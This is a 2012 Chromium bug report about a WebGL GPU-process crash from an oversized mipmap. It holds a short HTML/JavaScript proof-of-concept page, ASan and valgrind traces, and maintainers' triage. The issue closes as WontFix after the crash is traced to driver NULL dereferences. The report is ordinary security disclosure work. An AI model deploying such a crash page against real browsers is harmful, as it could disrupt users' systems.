
Issue metadata

Status: WontFix
Owner:
Closed: Sep 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security




Issue 145648: Security: webgl gpu process integer overflow with large mipmap, attempting free on address which was not malloc()-ed

Reported by miau...@gmail.com, Aug 30 2012

Issue description

VULNERABILITY DETAILS
webgl gpu process integer overflow with large mipmap, attempting free on address which was not malloc()-ed

crashes non-asan gpu process also

VERSION
Chrome Version: dev
Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        var gl = document.querySelector('canvas').getContext('experimental-webgl');
        var tex = gl.createTexture();
        gl.bindTexture(gl.TEXTURE_2D, tex);
        // define a valid 1x1 level 0 first
        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 1, 1, 0, gl.RGBA, gl.UNSIGNED_BYTE, null);
        // redefine level 0 with a width of 2^32 (does not fit a 32-bit GLsizei)
        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, Math.pow(2,32), Math.pow(2,12), 0, gl.RGBA, gl.UNSIGNED_BYTE, null);
        // ask the driver to build the mip chain from that level
        gl.generateMipmap(gl.TEXTURE_2D);
        setTimeout("window.close()", 1000);
      }
    </script>
  </head>
  <body>
    <canvas></canvas>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: asan + gpu
Crash State: 

==15120== ERROR: AddressSanitizer attempting free on address which was not malloc()-ed: 0x7fffde132780
    #0 0x55555f2a77b0 in __interceptor_free ??:0
    #1 0x7fffe9973455 in ?? ??:0
0x7fffde132780 is located 124 bytes inside of 33554432-byte region [0x7fffde132704,0x7fffe0132704)
freed by thread T0 here:
    #0 0x200000001
    #1 0x200000001
previously allocated by thread T0 here:
    #0 0x200000001
    #1 0x200000001
 
Attachments: unfree.txt (1.6 KB), unfree.html (598 bytes)

Comment 1 by tsepez@chromium.org, Aug 30 2012

Cc: zmo@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Mstone-22 OS-All Feature-GPU-WebGL SecSeverity-High
Owner: kbr@chromium.org

Comment 2 by infe...@chromium.org, Sep 5 2012

Cc: vangelis@chromium.org

Comment 3 by scarybea...@gmail.com, Sep 6 2012

Labels: ReleaseBlock-Stable

Comment 4 by zmo@chromium.org, Sep 6 2012

Cc: -zmo@chromium.org kbr@chromium.org
Owner: zmo@chromium.org
Status: Started
I'll take this one also

Comment 5 by infe...@chromium.org, Sep 6 2012

Cc: gman@chromium.org

Comment 6 by miau...@gmail.com, Sep 6 2012

=================================================================
==8808== ERROR: AddressSanitizer crashed on unknown address 0x000000000050 (pc 0x7fffe9e074cc sp 0x7fffffff7930 bp 0x000000000000 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fffe9e074cc (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x2b4cc)

intel crash

Comment 7 by gman@chromium.org, Sep 7 2012

Owner: gman@chromium.org
I haven't been able to repro this but it's possible this CL fixes it
http://codereview.chromium.org/10916165/

Comment 9 by infe...@chromium.org, Sep 7 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
miaubiz, can you try on trunk to see if it fixes it for you?

Comment 10 by miau...@gmail.com, Sep 8 2012

not fixed in 155560.

fwiw, on intel this crashes as a nullptr at 0x50, and it crashes the same with 0 instead of Math.pow(2,32) on the line:

        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, Math.pow(2,32), Math.pow(2,12), 0, gl.RGBA, gl.UNSIGNED_BYTE, null);

so this may be a false positive :|

Comment 11 by scarybea...@gmail.com, Sep 9 2012

Labels: -Merge-Approved
Status: WontFix
@miaubiz:

Q1) What driver was in use for #c0? Your note in #c10 implies that this is always a NULL on Intel, so were you using a different driver initially?

Q2) In #c0 you also stated, "crashes non-asan gpu process also". Do you have a crash ID for that?

Q3) Anything interesting if you try valgrind? Something like --gpu-launcher=valgrind ?

Comment 12 by miau...@gmail.com, Sep 9 2012

@scarybeasts: #c0 is on llvmpipe.

I don't have a crashid for it.  it looks like this in kern.log:

Sep  9 10:19:03 kernel: [1084557.692316] Chrome_InProcGp[16819]: segfault at 20000000a ip 0000555555bb6b61 sp 00007fffdd722670 error 4 in chromium-browser[555555554000+4dd4000]

this is with --gpu-launcher=valgrind, but it's a tcmalloced build:

third_party/tcmalloc/chromium/src/free_list.cc:117] Memory corruption detected. 
 Invalid write of size 1
    at 0x764FE0: tcmalloc::Abort() (in  /chrome-linux/chromium-browser)
    by 0x76C92B: tcmalloc::Log(tcmalloc::LogMode, char const*, int, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem) (in  /chrome-linux/chromium-browser)
    by 0x76ABF0: tcmalloc::FL_Next(void*) (in  /chrome-linux/chromium-browser)
    by 0x76ACE0: tcmalloc::FL_Pop(void**) (in  /chrome-linux/chromium-browser)
    by 0x385E096: operator new(unsigned long) (in  /chrome-linux/chromium-browser)
    by 0x12D45985: std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> >::_M_insert_aux(__gnu_cxx::__normal_iterator<llvm::MachineInstr**, std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> > >, llvm::MachineInstr* const&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B6D3D: llvm::LiveVariables::HandleVirtRegUse(unsigned int, llvm::MachineBasicBlock*, llvm::MachineInstr*) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B7E6F: llvm::LiveVariables::runOnMachineFunction(llvm::MachineFunction&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263A68: llvm::FPPassManager::runOnFunction(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263BB0: llvm::FunctionPassManagerImpl::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263C90: llvm::FunctionPassManager::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13358FFD: llvm::JIT::jitTheFunction(llvm::Function*, llvm::MutexGuard const&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
  Address 0x39 is not stack'd, malloc'd or (recently) free'd
 
 Process terminating with default action of signal 11 (SIGSEGV)
  Access not within mapped region at address 0x39
    at 0x764FE0: tcmalloc::Abort() (in  /chrome-linux/chromium-browser)
    by 0x76C92B: tcmalloc::Log(tcmalloc::LogMode, char const*, int, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem) (in  /chrome-linux/chromium-browser)
    by 0x76ABF0: tcmalloc::FL_Next(void*) (in  /chrome-linux/chromium-browser)
    by 0x76ACE0: tcmalloc::FL_Pop(void**) (in  /chrome-linux/chromium-browser)
    by 0x385E096: operator new(unsigned long) (in  /chrome-linux/chromium-browser)
    by 0x12D45985: std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> >::_M_insert_aux(__gnu_cxx::__normal_iterator<llvm::MachineInstr**, std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> > >, llvm::MachineInstr* const&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B6D3D: llvm::LiveVariables::HandleVirtRegUse(unsigned int, llvm::MachineBasicBlock*, llvm::MachineInstr*) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B7E6F: llvm::LiveVariables::runOnMachineFunction(llvm::MachineFunction&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263A68: llvm::FPPassManager::runOnFunction(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263BB0: llvm::FunctionPassManagerImpl::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263C90: llvm::FunctionPassManager::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13358FFD: llvm::JIT::jitTheFunction(llvm::Function*, llvm::MutexGuard const&) (in /usr/lib/x86_64-

Comment 13 by scarybea...@gmail.com, Sep 14 2012

Confirm the NULL crash on Intel via valgrind:

==27855== Invalid read of size 8
==27855==    at 0x153AC4CC: intel_miptree_map (in /usr/lib/x86_64-linux-gnu/dri/i965_dri.so)
==27855==    by 0x153B148A: ??? (in /usr/lib/x86_64-linux-gnu/dri/i965_dri.so)
==27855==    by 0x156ED337: _mesa_generate_mipmap (in /usr/lib/x86_64-linux-gnu/dri/libdricore.so)
==27855==    by 0x1580C106: _mesa_meta_GenerateMipmap (in /usr/lib/x86_64-linux-gnu/dri/libdricore.so)
==27855==    by 0x156C4FDD: _mesa_GenerateMipmapEXT (in /usr/lib/x86_64-linux-gnu/dri/libdricore.so)
==27855==    by 0x3B98FD1: gpu::gles2::GLES2DecoderImpl::DoGenerateMipmap(unsigned int) (gles2_cmd_decoder.cc:3602)
==27855==    by 0x3BAE8DF: gpu::gles2::GLES2DecoderImpl::HandleGenerateMipmap(unsigned int, gpu::gles2::GenerateMipmap const&) (gles2_cmd_decoder_autogen.h:772)
==27855==    by 0x3B961A1: gpu::gles2::GLES2DecoderImpl::DoCommand(unsigned int, unsigned int, void const*) (in /home/chris/chrome/src/out/Debug/chrome)
==27855==    by 0x3BF9F45: gpu::CommandParser::ProcessCommand() (cmd_parser.cc:72)
==27855==    by 0x3BBB851: gpu::GpuScheduler::PutChanged() (gpu_scheduler.cc:81)
==27855==    by 0x22B0236: GpuCommandBufferStub::PutChanged() (gpu_command_buffer_stub.cc:675)
==27855==    by 0x22B8671: base::internal::RunnableAdapter<void (GpuCommandBufferStub::*)()>::Run(GpuCommandBufferStub*) (bind_internal.h:134)
==27855==  Address 0x50 is not stack'd, malloc'd or (recently) free'd

Comment 14 by scarybea...@gmail.com, Sep 14 2012

@miaubiz: what's your machine setup that results in llvmpipe being used? Any weird GPU flags?

I basically want to make sure our blacklist is in order and that people aren't going to be exposed to llvmpipe bugginess in their "out-of-the-box" configs. We can re-open if anything interesting comes from the conversation.

I wonder if the attacker can force the use of llvmpipe by deliberately using GL extensions or capabilities unsupported by the underlying driver / hardware?

Comment 15 by kbr@chromium.org, Sep 14 2012

Comment 17 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-Internals -Mstone-22 -Feature-GPU-WebGL -SecSeverity-High Cr-Internals-GPU-WebGL M-22 Cr-Internals Security-Severity-High Type-Bug-Security

Comment 18 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 19 by bugdroid1@chromium.org, Apr 10 2013

Project Member
Labels: -Cr-Internals-GPU-WebGL Cr-Blink-WebGL

Comment 20 by jsc...@chromium.org, Nov 18 2013

Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Comment 21 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 22 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 23 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic
